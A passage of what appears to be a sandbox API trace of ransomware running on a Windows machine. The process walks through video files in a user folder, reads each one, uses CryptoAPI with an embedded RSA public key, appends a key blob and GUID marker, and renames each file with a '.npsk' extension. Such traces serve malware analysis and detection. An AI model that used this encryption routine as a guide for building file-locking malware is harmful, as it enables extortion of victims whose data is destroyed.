(hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.213] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.213] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.213] GetLastError () returned 0x0 [0216.213] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.213] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.213] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.213] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.213] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.214] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.214] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc6c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.214] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.214] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.214] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.214] CloseHandle (hObject=0x61c) returned 1 [0216.216] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfbLFIv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfblfiv.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfbLFIv.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfblfiv.flv.npsk")) returned 1 [0216.217] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba599110, ftCreationTime.dwHighDateTime=0x1d5dc64, ftLastAccessTime.dwLowDateTime=0x10ccab90, ftLastAccessTime.dwHighDateTime=0x1d5e7a0, ftLastWriteTime.dwLowDateTime=0x10ccab90, ftLastWriteTime.dwHighDateTime=0x1d5e7a0, nFileSizeHigh=0x0, nFileSizeLow=0x16c78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x6 Q53u.swf", cAlternateFileName="X6Q53U~1.SWF")) returned 1 [0216.217] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x6 Q53u.swf") returned=".swf" [0216.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x6 Q53u.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\x6 q53u.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.217] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=93304) returned 1 [0216.217] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.219] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16c52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.219] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.220] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16c78, lpOverlapped=0x0) returned 1 [0216.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.221] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.222] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.222] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.222] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.222] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.222] GetLastError () returned 0x0 [0216.222] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.222] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.222] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.222] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.222] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.223] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.223] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16c78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.223] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.224] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.224] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.224] CloseHandle (hObject=0x61c) returned 1 [0216.225] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x6 Q53u.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\x6 q53u.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\x6 Q53u.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\x6 q53u.swf.npsk")) returned 1 [0216.227] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf9d7f0, ftCreationTime.dwHighDateTime=0x1d5df1f, ftLastAccessTime.dwLowDateTime=0x6d144850, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x6d144850, ftLastWriteTime.dwHighDateTime=0x1d5e475, nFileSizeHigh=0x0, nFileSizeLow=0x18d5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xh29.mp4", cAlternateFileName="")) returned 1 [0216.227] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xh29.mp4") returned=".mp4" [0216.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xh29.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xh29.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.227] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=101724) returned 1 [0216.227] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.229] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x18d36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.229] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.231] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x18d5c, lpOverlapped=0x0) returned 1 [0216.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.232] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.233] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.233] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.233] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.233] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.233] GetLastError () returned 0x0 [0216.233] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.233] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.233] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.233] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.233] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.234] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.235] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x18d5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.235] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.236] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.236] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.236] CloseHandle (hObject=0x61c) returned 1 [0216.237] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xh29.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xh29.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xh29.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xh29.mp4.npsk")) returned 1 [0216.238] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84bf0c90, ftCreationTime.dwHighDateTime=0x1d5db99, ftLastAccessTime.dwLowDateTime=0x431e4c90, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x431e4c90, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x2a4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XQMQgugd.swf", cAlternateFileName="")) returned 1 [0216.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XQMQgugd.swf") returned=".swf" [0216.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XQMQgugd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xqmqgugd.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.239] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=10829) returned 1 [0216.239] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.240] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2a27, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.240] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.242] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2a4d, lpOverlapped=0x0) returned 1 [0216.242] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.242] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.242] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.242] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.243] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.243] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.243] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.243] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.243] GetLastError () returned 0x0 [0216.243] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.243] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.244] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.244] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.244] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.244] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.244] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2a4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.244] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.244] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.244] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.244] CloseHandle (hObject=0x61c) returned 1 [0216.245] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XQMQgugd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xqmqgugd.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XQMQgugd.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xqmqgugd.swf.npsk")) returned 1 [0216.247] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e915cd0, ftCreationTime.dwHighDateTime=0x1d5e822, ftLastAccessTime.dwLowDateTime=0xfe4ad180, ftLastAccessTime.dwHighDateTime=0x1d5e0bb, ftLastWriteTime.dwLowDateTime=0xfe4ad180, ftLastWriteTime.dwHighDateTime=0x1d5e0bb, nFileSizeHigh=0x0, nFileSizeLow=0x13484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y6zjlhJWSCzUXZzpeuR.avi", cAlternateFileName="Y6ZJLH~1.AVI")) returned 1 [0216.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Y6zjlhJWSCzUXZzpeuR.avi") returned=".avi" [0216.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Y6zjlhJWSCzUXZzpeuR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\y6zjlhjwsczuxzzpeur.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.247] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=78980) returned 1 [0216.247] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.249] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1345e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.249] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.251] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x13484, lpOverlapped=0x0) returned 1 [0216.251] lstrlenA (lpString="-----BEGIN PUBLIC 